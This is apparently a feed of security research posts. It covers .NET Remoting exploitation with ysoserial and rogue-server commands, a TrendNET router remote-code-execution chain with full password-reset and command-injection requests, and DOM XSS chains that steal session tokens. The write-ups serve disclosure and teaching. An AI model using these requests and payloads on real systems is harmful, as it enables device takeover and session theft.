
Windows Drivers Reverse Engineering Methodology

By: voidsec
20 January 2022 at 15:30

With this blog post I’d like to sum up my year-long Windows Drivers research; share and detail my own methodology for reverse engineering (WDM) Windows drivers, finding some possible vulnerable code paths as well as understanding their exploitability. I’ve tried to make it as “noob-friendly” as possible, documenting all the steps I usually perform during […]

The post Windows Drivers Reverse Engineering Methodology appeared first on VoidSec.

.NET Remoting Revisited

27 January 2022 at 14:49

.NET Remoting is the built-in architecture for remote method invocation in .NET. It is also the origin of the (in-)famous BinaryFormatter and SoapFormatter serializers and not just for that reason a promising target to watch for.

This blog post attempts to give insights into its features, security measures, and especially its weaknesses/vulnerabilities that often result in remote code execution. We're also introducing major additions to the ExploitRemotingService tool, a new ObjRef gadget for YSoSerial.Net, and finally a RogueRemotingServer as counterpart to the ObjRef gadget.

If you already understand the internals of .NET Remoting, you may skip the introduction and proceed directly to Security Features, Pitfalls, and Bypasses.

Introduction

.NET Remoting is deeply integrated into the .NET Framework and allows invocation of methods across so called remoting boundaries. These can be different app domains within a single process, different processes on the same computer, or different processes on different computers. Supported transports between the client and server are HTTP, IPC (named pipes), and TCP.

Here is a simple example for illustration: the server creates and registers a transport server channel and then registers the class as a service with a well-known name at the server's registry:

var channel = new TcpServerChannel(12345);
ChannelServices.RegisterChannel(channel);
RemotingConfiguration.RegisterWellKnownServiceType(
    typeof(MyRemotingClass),
    "MyRemotingClass"
);

Then a client just needs the URL of the registered service to do remoting with the server:

var remote = (MyRemotingClass)RemotingServices.Connect(
    typeof(MyRemotingClass),
    "tcp://remoting-server:12345/MyRemotingClass"
);

With this, every invocation of a method or property accessor on remote gets forwarded to the remoting server, executed there, and the result gets returned to the client. This all happens transparently to the developer.
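
For completeness, here is a minimal sketch of what MyRemotingClass could look like; the class body and the Hello method are assumptions, as the original example does not show them. The only requirement is that the class extends MarshalByRefObject:

public class MyRemotingClass : MarshalByRefObject
{
    // Invoked on the server; only the arguments and the return value
    // travel over the remoting channel.
    public string Hello(string name)
    {
        return "Hello, " + name;
    }
}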

And although .NET Remoting was deprecated with the release of .NET Framework 3.0 in 2006 and is no longer available on .NET Core and .NET 5+, it is still around, even in contemporary enterprise-level software products.

Remoting Internals

If you are interested in how .NET Remoting works under the hood, here are some insights.

In simple terms: when the client connects to the remoting object provided by the server, it creates a RemotingProxy that implements the specified type MyRemotingClass. All method invocations on remote at the client (except for GetType() and GetHashCode()) will get sent to the server as remoting calls. When a method gets invoked on remote, the proxy creates a MethodCall object that holds the information of the method and passed parameters. It is then passed to a chain of sinks that prepare the MethodCall and handle the remoting communication with the server over the given transport.
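
The interception mechanism can be illustrated with the public RealProxy API, on which the remoting infrastructure builds. The following is a simplified sketch, not the actual RemotingProxy implementation, and IMyInterface is a hypothetical type: every call on the transparent proxy arrives as an IMethodCallMessage, just like the MethodCall objects described above.

using System;
using System.Runtime.Remoting.Messaging;
using System.Runtime.Remoting.Proxies;

class LoggingProxy : RealProxy
{
    public LoggingProxy(Type type) : base(type) { }

    public override IMessage Invoke(IMessage msg)
    {
        // The message holds the invoked method and its arguments.
        var call = (IMethodCallMessage)msg;
        Console.WriteLine("Intercepted call to " + call.MethodName);

        // A remoting proxy would now hand the message to its sink chain;
        // this sketch just returns a null result.
        return new ReturnMessage(null, null, 0, call.LogicalCallContext, call);
    }
}

// Usage (IMyInterface is hypothetical):
// var obj = (IMyInterface)new LoggingProxy(typeof(IMyInterface)).GetTransparentProxy();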

On the server side, the received request is also passed to a chain of sinks that reverses the process, which also includes deserialization of the MethodCall object. It ends in a dispatcher sink, which invokes the actual implementation of the method with the passed parameters. The result of the method invocation is then put in a MethodResponse object and gets returned to the client where the client sink chain deserializes the MethodResponse object, extracts the returned object and passes it back to the RemotingProxy.

Channel Sinks

When the client or server creates a channel (either explicitly or implicitly by connecting to a remote service), it also sets up a chain of sinks for processing outgoing and incoming requests. For the server chain, the first sink is a transport sink, followed by formatter sinks (this is where the BinaryFormatter and SoapFormatter are used), and ending in the dispatch sink. It is also possible to add custom sinks. For the three transports, the server default chains are as follows:

  • HttpServerChannel:
    HttpServerTransportSink → SdlChannelSink → SoapServerFormatterSink → BinaryServerFormatterSink → DispatchChannelSink
  • IpcServerChannel:
    IpcServerTransportSink → BinaryServerFormatterSink → SoapServerFormatterSink → DispatchChannelSink
  • TcpServerChannel:
    TcpServerTransportSink → BinaryServerFormatterSink → SoapServerFormatterSink → DispatchChannelSink

On the client side, the sink chain looks similar but in reversed order: first a formatter sink and finally the transport sink.

Note that the default client sink chain has a default formatter for each transport (HTTP uses SOAP, IPC and TCP use binary format) while the default server sink chain can process both formats. The default sink chains are only used if the channel was not created with an explicit IClientChannelSinkProvider and/or IServerChannelSinkProvider.
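
For illustration, this is roughly how a server channel with an explicit formatter sink provider could be set up (a sketch; the port value and the chosen TypeFilterLevel are arbitrary examples):

// using System.Collections; using System.Runtime.Remoting.Channels;
// using System.Runtime.Remoting.Channels.Tcp;

// Explicitly choose the binary formatter for a TCP server channel
// instead of relying on the default sink chain.
var provider = new BinaryServerFormatterSinkProvider();
provider.TypeFilterLevel = System.Runtime.Serialization.Formatters.TypeFilterLevel.Full;

IDictionary props = new Hashtable();
props["port"] = 12345;

ChannelServices.RegisterChannel(new TcpServerChannel(props, provider));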

Passing Parameters and Return Values

Parameter values and return values can be transferred in two ways:

  • by value: if the type is serializable (cf. Type.IsSerializable) or if there is a serialization surrogate for the type (see the following paragraphs)
  • by reference: if the type extends MarshalByRefObject (cf. Type.IsMarshalByRef)

In the latter case, the objects need to be marshaled using one of the RemotingServices.Marshal methods. These register the object at the server's registry and return an ObjRef instance that holds the URL and type information of the marshaled object.
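
As a rough sketch, explicit marshaling looks like this (reusing the MyRemotingClass example from above; the URI is arbitrary):

// using System; using System.Runtime.Remoting;

var instance = new MyRemotingClass();

// Publish the instance at a well-known URI; the returned ObjRef holds
// the URL and type information a client needs to build a proxy.
ObjRef objRef = RemotingServices.Marshal(instance, "MyInstance");
Console.WriteLine(objRef.URI);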

The marshaling happens automatically during serialization through the serialization surrogate class RemotingSurrogate that is used for the BinaryFormatter/SoapFormatter in .NET Remoting (see CoreChannel.CreateBinaryFormatter(bool, bool) and CoreChannel.CreateSoapFormatter(bool, bool)). A serialization surrogate allows customizing the serialization/deserialization of specified types.

In case of objects extending MarshalByRefObject, the RemotingSurrogateSelector returns a RemotingSurrogate (see RemotingSurrogateSelector.GetSurrogate(Type, StreamingContext, out ISurrogateSelector)). It then calls the RemotingSurrogate.GetObjectData(Object, SerializationInfo, StreamingContext) method, which calls RemotingServices.GetObjectData(object, SerializationInfo, StreamingContext), which then calls RemotingServices.MarshalInternal(MarshalByRefObject, string, Type). That basically means that every remoting object extending MarshalByRefObject is substituted with an ObjRef and thus passed by reference instead of by value.

On the receiving side, if an ObjRef gets deserialized by the BinaryFormatter/SoapFormatter, the IObjectReference.GetRealObject(StreamingContext) implementation of ObjRef gets called eventually. That interface method is used to replace an object during deserialization with the object returned by that method. In case of ObjRef, the method results in a call to RemotingServices.Unmarshal(ObjRef, bool), which creates a RemotingProxy of the type and target URL specified in the deserialized ObjRef.

That means that in .NET Remoting, all objects extending MarshalByRefObject are passed by reference using an ObjRef. And deserializing an ObjRef with a BinaryFormatter/SoapFormatter (not just limited to .NET Remoting) results in the creation of a RemotingProxy.
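
This substitution can be reproduced outside of a remoting channel, which is exactly what makes it security-relevant. A minimal sketch, assuming the MyRemotingClass from the earlier example:

// using System.IO; using System.Runtime.Remoting.Messaging;
// using System.Runtime.Serialization.Formatters.Binary;

var formatter = new BinaryFormatter();

// Install the remoting surrogate selector, as the remoting formatters
// do internally via CoreChannel.CreateBinaryFormatter(...).
formatter.SurrogateSelector = new RemotingSurrogateSelector();

var stream = new MemoryStream();
formatter.Serialize(stream, new MyRemotingClass());

// The stream now contains an ObjRef (URL and type information) instead
// of the object's state; a BinaryFormatter deserializing it in another
// process would end up with a RemotingProxy via ObjRef.GetRealObject().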

With this knowledge in mind, it should be easier to follow the rest of this post.

Previous Work

Most of the issues of .NET Remoting and the runtime serializers BinaryFormatter/SoapFormatter have already been identified by James Forshaw in his published papers and blog posts.

We highly encourage you to take the time to read the papers/posts. They are also the foundation of the ExploitRemotingService tool that will be detailed in ExploitRemotingService Explained further down in this post.

Security Features, Pitfalls, and Bypasses

.NET Remoting is fairly configurable. The following security aspects are built in and can be configured using special channel and formatter properties:

  • Authentication
    ◦ HTTP channel: n/a
    ◦ IPC channel: n/a
    ◦ TCP channel: secure=bool channel property; ISecurableChannel.IsSecured (via NegotiateStream; default: false)
  • Authorization
    ◦ HTTP channel: n/a
    ◦ IPC channel: authorizationGroups=Windows/AD group channel property (default: thread owner is allowed, NT Authority\Network group (SID S-1-5-2) is denied); alternatively, a CommonSecurityDescriptor passed to an IpcServerChannel constructor
    ◦ TCP channel: custom IAuthorizeRemotingConnection class, set via the authorizationModule channel property or passed to a TcpServerChannel constructor
  • Impersonation
    ◦ HTTP channel: n/a
    ◦ IPC channel: impersonate=bool (default: false)
    ◦ TCP channel: impersonate=bool (default: false)
  • Confidentiality, Integrity, Authentication Protection
    ◦ HTTP channel: n/a
    ◦ IPC channel: n/a
    ◦ TCP channel: protectionLevel={None, Sign, EncryptAndSign} channel property
  • Interface Binding
    ◦ HTTP channel: n/a
    ◦ IPC channel: n/a
    ◦ TCP channel: rejectRemoteRequests=bool (loopback only, default: false), bindTo=address (specific IP address, default: n/a)
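
To illustrate how these properties fit together, a hardened TCP server channel might be configured as follows (a sketch; the values are examples, not recommendations):

// using System.Collections; using System.Runtime.Remoting.Channels;
// using System.Runtime.Remoting.Channels.Tcp;

IDictionary props = new Hashtable();
props["port"] = 12345;
props["secure"] = true;                       // require authentication (NegotiateStream)
props["protectionLevel"] = "EncryptAndSign";  // integrity and confidentiality
props["rejectRemoteRequests"] = true;         // accept loopback connections only

ChannelServices.RegisterChannel(new TcpServerChannel(props, null), true);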

Pitfalls and important notes on these security features:

HTTP Channel
  • No security features provided; ought to be implemented in IIS or by custom server sinks.
IPC Channel
  • By default, access to the named pipe created by the IPC server channel is denied to the NT Authority\Network group (SID S-1-5-2), i.e., it is only accessible from the same machine. However, when authorizationGroup is used, this network restriction is not in place, so the group that is allowed to access the named pipe may also do so remotely (not supported by the default IpcClientTransportSink, though).
TCP Channel
  • With a secure TCP channel, authentication is required. However, if no custom IAuthorizeRemotingConnection is configured for authorization, it is possible to log on with any valid Windows account, including NT Authority\Anonymous Logon (SID S-1-5-7). A custom authorizer is sketched below.
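
A custom IAuthorizeRemotingConnection that rejects such anonymous logons could look roughly like this (a sketch; the class name and the rejection logic are only examples):

using System;
using System.Net;
using System.Runtime.Remoting.Channels.Tcp;
using System.Security.Principal;

class DenyAnonymousLogon : IAuthorizeRemotingConnection
{
    // Called with the client's network endpoint before authentication.
    public bool IsConnectingEndPointAccepted(EndPoint endPoint)
    {
        return true; // no IP-based filtering in this sketch
    }

    // Called with the authenticated identity of the connecting client.
    public bool IsConnectingIdentityAccepted(IIdentity identity)
    {
        return identity != null
            && identity.IsAuthenticated
            && !identity.Name.Equals(@"NT AUTHORITY\ANONYMOUS LOGON",
                                     StringComparison.OrdinalIgnoreCase);
    }
}

// Passed as the third constructor argument:
// new TcpServerChannel(props, provider, new DenyAnonymousLogon())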

ExploitRemotingService Explained

James Forshaw also released ExploitRemotingService, a tool for attacking .NET Remoting services via IPC/TCP using various attack techniques. We'll try to explain them here.

There are basically two attack modes:

raw
Exploit BinaryFormatter/SoapFormatter deserialization (see also YSoSerial.Net)
all other commands (see -h)
Write a FakeAsm assembly to the server's file system and load a type from it, registering it at the server so that it is accessible via the existing .NET Remoting channel. It can then be used to perform various commands.

To see the real beauty of his sorcery and craftsmanship, we'll try to explain the different operating options for the FakeAsm exploitation and their effects:

without options
Send a FakeMessage that extends MarshalByRefObject and thus is a reference (ObjRef) to an object on the attacker's server. On deserialization, the victim's server creates a proxy that transparently forwards all method invocations to the attacker's server. By exploiting a TOCTOU flaw, the get_MethodBase() property method of the sent message (FakeMessage) can be adjusted so that even static methods can be called. This makes it possible to call File.WriteAllBytes(string, byte[]) on the victim's machine.
--useser
Send a forged Hashtable with a custom IEqualityComparer by reference that implements GetHashCode(object), which the victim server calls remotely on the attacker's server. As for the key, a FileInfo/DirectoryInfo object is wrapped in a SerializationWrapper that ensures the attacker's object gets marshaled by value instead of by reference. However, on the remote call of GetHashCode(object), the victim's server sends the FileInfo/DirectoryInfo by reference, so that the attacker has a reference to the FileInfo/DirectoryInfo object on the victim.
--uselease
Call MarshalByRefObject.InitializeLifetimeService() on a published object to get an ILease instance. Then call Register(ISponsor) with a MarshalByRefObject as parameter to make the server call IConvertible.ToType(Type, IFormatProvider) on an object on the attacker's server, which can then deliver the deserialization payload.

Now the problem with the --uselease option is that the remote class needs to return an actual ILease object and not null. This may happen if the virtual MarshalByRefObject.InitializeLifetimeService() method is overridden. But the main principle of sending an ObjRef referencing an object on the attacker's server can be generalized with any method accepting a parameter. That is why we have added the --useobjref option to ExploitRemotingService (see also Community Contributions further below):

--useobjref
Call the MarshalByRefObject.CreateObjRef(Type) method with an ObjRef as parameter value. Similarly to --uselease, the server calls IConvertible.ToType(Type, IFormatProvider) on the proxy, which sends a remoting call to the attacker's server.

Security Measures and Troubleshooting

If no custom errors are enabled and a RemotingException gets returned by the server, the following may help to identify the cause and to find a solution:

  • Error: "Requested Service not found"
    Reason: the URI of an existing remoting service must be known; there is no way to iterate them.
    ExampleRemotingService options: n/a
    ExploitRemotingService bypass options: --nulluri may work if the remoting service has not been servicing any requests yet.
  • Error: NotSupportedException with a link to KB 390633
    Reason: received IMessage objects are disallowed from being MarshalByRefObject (see AppSettings.AllowTransparentProxyMessage).
    ExampleRemotingService options: -d
    ExploitRemotingService bypass options: --uselease, --useobjref
  • Error: SecurityException with PermissionSet info
    Reason: Code Access Security (CAS) restricted permissions are in place (TypeFilterLevel.Low).
    ExampleRemotingService options: -t low
    ExploitRemotingService bypass options: --uselease, --useobjref

Community Contributions

Our research on .NET Remoting led to some new insights and discoveries that we want to share with the community. Together with this blog post, we have prepared the following contributions and new releases.

ExploitRemotingService

ExploitRemotingService is already a magnificent tool for exploiting .NET Remoting services. However, we have made some additions to it that we think are worthwhile:

--useobjref option
This newly added option allows using the ObjRef trick described above.
--remname option
Assemblies can only be loaded by name once. If that loading fails, the runtime remembers the failure and avoids trying to load the assembly again. That means that writing the FakeAsm.dll to the target server's file system and loading a type from that assembly must succeed on the first attempt. The problem here is finding the proper location to write the assembly to where it will be searched for by the runtime (ExploitRemotingService provides the options --autodir and --installdir=… to specify the location to write the DLL to). We have modified ExploitRemotingService so that the --remname option can be used to name the FakeAsm assembly, making it possible to have multiple attempts at writing the assembly file to an appropriate location.
--ipcserver option
As IPC server channels may be accessible remotely, the --ipcserver option allows to specify the server's name for a remote connection.

YSoSerial.Net

The new ObjRef gadget is basically the equivalent of the sun.rmi.server.UnicastRef class used by the JRMPClient gadget in ysoserial for Java: on deserialization via BinaryFormatter/SoapFormatter, the ObjRef gets transformed to a RemotingProxy and method invocations on that object result in the attempt to send an outgoing remote method call to a specified target .NET Remoting endpoint. This can then be used with the RogueRemotingServer described below.

RogueRemotingServer

The newly released RogueRemotingServer is the counterpart of the ObjRef gadget for YSoSerial.Net. It is the equivalent to the JRMPListener server in ysoserial for Java and allows to start a rogue remoting server that delivers a raw BinaryFormatter/SoapFormatter payload via HTTP/IPC/TCP.

Example of ObjRef Gadget and RogueRemotingServer

Here is an example of how these tools can be used together:

# generate a SOAP payload for popping MSPaint
ysoserial.exe -f SoapFormatter -g TextFormattingRunProperties -o raw -c MSPaint.exe > MSPaint.soap

# start server to deliver the payload on all interfaces
RogueRemotingServer.exe --wrapSoapPayload http://0.0.0.0/index.html MSPaint.soap
# test the ObjRef gadget with the target http://attacker/index.html
ysoserial.exe -f BinaryFormatter -g ObjRef -o raw -c http://attacker/index.html -t

During deserialization of the ObjRef gadget, an outgoing .NET Remoting method call request gets sent to the RogueRemotingServer, which replies with the TextFormattingRunProperties gadget payload.

Conclusion

.NET Remoting was deprecated a long time ago for obvious reasons. If you are a developer, don't use it; migrate from .NET Remoting to WCF.

If you have detected a .NET Remoting service and want to exploit it, we recommend the excellent ExploitRemotingService by James Forshaw, which works with IPC and TCP (for HTTP, have a look at Finding and Exploiting .NET Remoting over HTTP using Deserialisation by Soroush Dalili). If that doesn't succeed, you may want to try the enhancements added to our fork of ExploitRemotingService; especially the --useobjref technique and/or naming the FakeAsm assembly via --remname might help. And even if none of these work, you may still be able to invoke arbitrary methods on the exposed objects and take advantage of that.

TrendNET AC2600 RCE via WAN

31 January 2022 at 14:03

This blog provides a walkthrough of how to gain RCE on the TrendNET AC2600 (model TEW-827DRU specifically) consumer router via the WAN interface. There is currently no publicly available patch for these issues; therefore only a subset of issues disclosed in TRA-2021–54 will be discussed in this post. For more details regarding other security-related issues in this device, please refer to the Tenable Research Advisory.

In order to achieve arbitrary execution on the device, three flaws need to be chained together: a firewall misconfiguration, a hidden administrative command, and a command injection vulnerability.

The first step in this chain involves finding one of the devices on the internet. Many remote router attacks require some sort of management interface to be manually enabled by the administrator of the device. Fortunately for us, this device has no such requirement. All of its services are exposed via the WAN interface by default. Unfortunately for us, however, they’re exposed only via IPv6. Due to an oversight in the default firewall rules for the device, there are no restrictions made to IPv6, which is enabled by default.

Once a device has been located, the next step is to gain administrative access. This involves compromising the admin account by utilizing a hidden administrative command, which is available without authentication. The “apply_sec.cgi” endpoint contains a hidden action called “tools_admin_elecom.” This action contains a variety of methods for managing the device. Using this hidden functionality, we are able to change the password of the admin account to something of our own choosing. The following request demonstrates changing the admin password to “testing123”:

POST /apply_sec.cgi HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 145
Origin: http://192.168.10.1
Connection: close
Referer: http://192.168.10.1/setup_wizard.asp
Cookie: compact_display_state=false
Upgrade-Insecure-Requests: 1
ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=testing123

The third and final flaw we need to abuse is a command injection vulnerability in the syslog functionality of the device. If properly configured, which it is by default, syslogd spawns during boot. If a malformed parameter is supplied in the config file and the device is rebooted, syslogd will fail to start.

When visiting the syslog configuration page (adm_syslog.asp), the backend checks to see if syslogd is running. If not, an attempt is made to start it, which is done by a system() call that accepts user controllable input. This system() call runs input from the cameo.cameo.syslog_server parameter. We need to somehow stop the service, supply a command to be injected, and restart the service.

The exploit chain for this vulnerability is as follows:

  1. Send a request to corrupt the syslog command file and change the cameo.cameo.syslog_server parameter to contain an injected command
  2. Reboot the device to stop the service (possible via the web interface or through a manual request)
  3. Visit the syslog config page to trigger system() call

The following request will both corrupt the configuration file and supply the necessary syslog_server parameter for injection. Telnetd was chosen as the command to inject.

POST /apply.cgi HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 363
Origin: http://192.168.10.1
Connection: close
Referer: http://192.168.10.1/adm_syslog.asp
Cookie: compact_display_state=false
ccp_act=set&html_response_return_page=adm_syslog.asp&action=tools_syslog&reboot_type=application&cameo.cameo.syslog_server=1%2F192.168.1.1:1234%3btelnetd%3b&cameo.log.enable=1&cameo.log.server=break_config&cameo.log.log_system_activity=1&cameo.log.log_attacks=1&cameo.log.log_notice=1&cameo.log.log_debug_information=1&1629923014463=1629923014463

Once we reboot the device and re-visit the syslog configuration page, we’ll be able to telnet into the device as root.

Since IPv6 raises the barrier of entry in discovering these devices, we don’t expect widespread exploitation. That said, it’s a pretty simple exploit chain that can be fully automated. Hopefully the vendor releases patches publicly soon.


TrendNET AC2600 RCE via WAN was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Solving DOM XSS Puzzles

3 February 2022 at 00:05

DOM-based Cross-site scripting (XSS) vulnerabilities rank as one of my favourite vulnerabilities to exploit. It's a bit like solving a puzzle; sometimes you get a corner piece like $.html(), other times you have to rely on trial-and-error. I recently encountered two interesting postMessage DOM XSS vulnerabilities in bug bounty programs that scratched my puzzle-solving itch.

Note: Some details have been anonymized.

Puzzle A: The Postman Problem

postMessage emerged in recent years as a common source of XSS bugs. As developers moved to client-side JavaScript frameworks, classic server-side rendered XSS vulnerabilities disappeared. Instead, frontends used asynchronous communication streams such as postMessage and WebSockets to dynamically modify content.

I keep an eye out for postMessage calls with Frans Rosén's postmessage-tracker tool. It's a Chrome extension that helpfully alerts you whenever it detects a postMessage call and enumerates the path from source to sink. However, while postMessage calls abound, most tend to be false positives and require manual validation.

While browsing Company A’s website at https://feedback.companyA.com/, postmessage-tracker notified me of a particularly interesting call originating from an iFrame https://abc.cloudfront.net/iframe_chat.html:

window.addEventListener("message", function(e) {
...
    } else if (e.data.type =='ChatSettings') {
         if (e.data.iframeChatSettings) {
             window.settingsSync =  e.data.iframeChatSettings;
...

The postMessage handler checked if the message data (e.data) contained a type value matching ChatSettings. If so, it set window.settingsSync to e.data.iframeChatSettings. It did not perform any origin checks – always a good sign for bug hunters, since the message could be sent from any attacker-controlled domain.

What was window.settingsSync used for? By searching for this string in Burp, I discovered https://abc.cloudfront.net/third-party.js:

else if(window.settingsSync.environment == "production"){
  var region = window.settingsSync.region;
  var subdomain = region.split("_")[1]+'-'+region.split("_")[0]
  domain = 'https://'+subdomain+'.settingsSync.com'
}
var url = domain+'/public/ext_data'

request.open('POST', url, true);
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.onload = function () {
  if (request.status == 200) {
    var data = JSON.parse(this.response);
...
    window.settingsSync = data;
...
    var newScript = 'https://abc.cloudfront.net/module-v'+window.settingsSync.versionNumber+'.js';
    loadScript(document, newScript);

If window.settingsSync.environment == "production", window.settingsSync.region would be rearranged into subdomain and inserted into domain = 'https://'+subdomain+'.settingsSync.com'. This URL would then be used in a POST request. The response would be parsed as JSON and assigned to window.settingsSync. Next, window.settingsSync.versionNumber was used to construct the URL of a new JavaScript file to load: var newScript = 'https://abc.cloudfront.net/module-v'+window.settingsSync.versionNumber+'.js'.

In a typical scenario, the page would load https://abc.cloudfront.net/module-v2.js:

config = window.settingsSync.config;
…
eval("window.settingsSync.configs."+config)

Aha! eval was a simple sink that executed its string argument as JavaScript. If I controlled config, I could execute arbitrary JavaScript!

However, how could I manipulate domain to match my malicious server instead of *.settingsSync.com? I inspected the code again:

  var region = window.settingsSync.region;
  var subdomain = region.split("_")[1]+'-'+region.split("_")[0]
  domain = 'https://'+subdomain+'.settingsSync.com'

I noticed that due to insufficient sanitisation and simple concatenation, a window.settingsSync.region value like .my.website/malicious.php?_bad would be rearranged into https://bad-.my.website/malicious.php?.settingsSync.com! Now domain pointed to bad-.my.website, a valid attacker-controlled domain that could serve a malicious payload in response to the POST request.

Diagram 1

I created malicious.php on my server to send a valid response by capturing the responses from the origin target. I modified the name of the selected config to my XSS payload:

<?php
$origin = $_SERVER['HTTP_ORIGIN'];
header('Access-Control-Allow-Origin: ' . $origin);
header('Access-Control-Allow-Headers: cache-control');
header("Content-Type: application/json; charset=UTF-8");

echo '{
    "versionNumber": "2",
    "config": “a;alert()//“,
    "configs": {
        "a": "a"
    }
    ...
}'
?>

Based on this response, the sink would now execute:

eval("window.settingsSync.configs.a;alert()//”)

From my own domain, I spawned the page containing the vulnerable iFrame with var child = window.open("https://feedback.companyA.com/"), then sent the PostMessage payload with child.frames[1].postMessage(...). With that, the alert box popped!

However, I still needed one final piece. Since the XSS executed in the context of an iFrame https://abc.cloudfront.net/iframe_chat.html instead of https://feedback.companyA.com/, there was no actual impact; it was as good as executing XSS on an external domain. I needed to somehow leverage this XSS in the iFrame to reach the parent window https://feedback.companyA.com/.

Thankfully, https://feedback.companyA.com/ included yet another interesting postMessage handler:

    }, d = document.getElementById("iframeChat"), window.addEventListener("message", function(m) {
        var e;
        "https://abc.cloudfront.net" === m.origin && ("IframeLoaded" == m.data.type && d.contentWindow.postMessage({
            type: "credentialConfig",
            credentialConfig: credentialConfig
        }, "*"))

https://feedback.companyA.com/ created a PostMessage listener that validated the message origin as https://abc.cloudfront.net. If the message data type was IframeLoaded, it sent a PostMessage back with credentialConfig data.

credentialConfig included a session token:

{
    "region": "en-uk",
    "environment": "production",
    "userId": "<USERID>",
    "sessionToken": "Bearer <SESSIONTOKEN>"
}

Thus, by sending the PostMessage to trigger an XSS on https://abc.cloudfront.net/iframe_chat.html, the XSS would then run arbitrary JavaScript that sent another PostMessage from https://abc.cloudfront.net/iframe_chat.html to https://feedback.companyA.com/ which would leak the session token.

Based on this, I modified the XSS payload:

{
    "versionNumber": "2",
    "config": "a;window.addEventListener(`message`, (event) => {alert(JSON.stringify(event.data))});parent.postMessage({type:`IframeLoaded`},`*`)//",
    "configs": {
        "a": "a
    }
}

The XSS received the session data from the parent iFrame on https://feedback.companyA.com/ and exfiltrated the stolen sessionToken to an attacker-controlled server (I simply used alert here).

Puzzle B: Bypassing CSP with Newline Open Redirect

While exploring the OAuth flow of Company B, I noticed something strange about its OAuth authorization page. Typically, OAuth authorization pages present some kind of confirmation button to link an account. For example, here's Twitter's OAuth authorization page to login to GitLab:

OAuth Login

Company B's page used a URL with the following format: https://accept.companyb/confirmation?domain=oauth.companyb.com&state=<STATE>&client=<CLIENT ID>. Once the page was loaded, it would dynamically send a GET request to oauth.companyb.com/oauth_data?clientID=<CLIENT ID>. This returned some data to populate the page's contents:

{
    "app": {
        "logoUrl": <PAGE LOGO URL>,
        "name": <NAME>,
        "link": <URL> ,
        "introduction": "A cool app!"
        ...
    }
}

By playing around with this response data, I realised that introduction was injected into the page without any sanitisation. If I could control the destination of the GET request and subsequently the response, it would be possible to cause an XSS.

Fortunately, it appeared that the domain parameter allowed me to control the domain of the GET request. However, when I set this to my own domain, the request failed to execute and raised a Content Security Policy (CSP) error. I quickly checked the CSP of the page:

Content-Security-Policy: default-src 'self' 'unsafe-inline' *.companyb.com *.amazonaws.com; script-src 'self' https: *.companyb.com; object-src 'none';

When dynamic HTTP requests are made, they adhere to the connect-src CSP rule. In this case, the default-src rule meant that only requests to *.companyb.com and *.amazonaws.com were allowed. Unfortunately for the company, *.amazonaws.com created a big loophole: since AWS S3 files are hosted on *.s3.amazonaws.com, I could still send requests to my attacker-controlled bucket! Furthermore, CORS would not be an issue as AWS allows users to set the CORS policies of buckets.
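
For reference, making the bucket readable cross-origin only takes a permissive CORS configuration on the attacker's own bucket; something like the following (a sketch, in the JSON form the S3 console accepts):

[
    {
        "AllowedOrigins": ["*"],
        "AllowedMethods": ["GET"],
        "AllowedHeaders": ["*"]
    }
]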

I quickly hosted a JSON file with text as <script>alert()</script> on https://myevilbucket.s3.amazonaws.com/payload.json, then browsed to https://accept.companyb/confirmation?domain=myevilbucket.s3.amazonaws.com%2fpayload.json%3F&state=<STATE>&client=<CLIENT ID>. The page successfully requested my file at https://myevilbucket.s3.amazonaws.com/payload.json?/oauth_data?clientID=<CLIENT ID>, then... nothing.

One more problem remained: the CSP for script-src only allowed for self or *.companyb.com for HTTPS. Luckily, I had an open redirect on t.companyb.com saved for such situations. The vulnerable endpoint would redirect to the value of the url parameter but validate if the parameter ended in companyb.com. However, it allowed a newline character %0A in the subdomain section, which would be truncated by browsers such that http://t.companyb.com/redirect?url=http%3A%2F%2Fevil.com%0A.companyb.com%2F actually redirected to https://evil.com/%0A.companyb.com/ instead.

By using this bypass to create an open redirect, I saved my final XSS payload in <NEWLINE CHARACTER>.companyb.com in my web server's document root. I then injected a script tag with src pointing to the open redirect which passed the CSP but eventually redirected to the final payload.

Diagram 2

Conclusion

Both companies awarded bonuses for my XSS reports due to their complexity and ability to bypass hardened execution environments. I hope that by documenting my thought processes, you can also gain a few extra tips to solve DOM XSS puzzles.

CoronaCheck App TLS certificate vulnerabilities

3 February 2022 at 00:00

During the pandemic a lot of software has seen an explosive growth of active users, such as the software used for working from home. In addition, completely new applications have been developed to track and handle the pandemic, like those for Bluetooth-based contact tracing. These projects have been a focus of our research recently. With projects growing this quickly or facing a tight release deadline, security is often not given the required attention. It is therefore very useful to contribute some research time to improve the security of the applications all of us suddenly depend on. Previously, we found vulnerabilities in Zoom and Proctorio. This blog post details some vulnerabilities we found and reported in the Dutch CoronaCheck app. These vulnerabilities are related to the security of the connections used by the app and were difficult to exploit in practice. However, it is a little worrying to find this many vulnerabilities in an app for which security is of such critical importance.

Background

The CoronaCheck app can be used to generate a QR code proving that the user has received either a COVID-19 vaccination, has recently received a negative test result or has recovered from COVID-19. A separate app, the CoronaCheck Verifier, can be used to check these QR codes. These apps are used to give access to certain locations or events, which is known in The Netherlands as “Testen voor Toegang”. They may also be required for traveling to specific countries. The app used to generate the QR code is referred to in the codebase as the Holder app, to distinguish it from the Verifier app. The source code of these apps is available on GitHub, although active development takes place in a separate non-public repository. At certain intervals, the public source code is updated from the private repository.

The verification of the QR codes uses two different methods, depending on whether the code is for use in The Netherlands or internationally. The cryptographic process is very different for each. We spent a bit of time looking at these two processes, but found no (obvious) vulnerabilities.

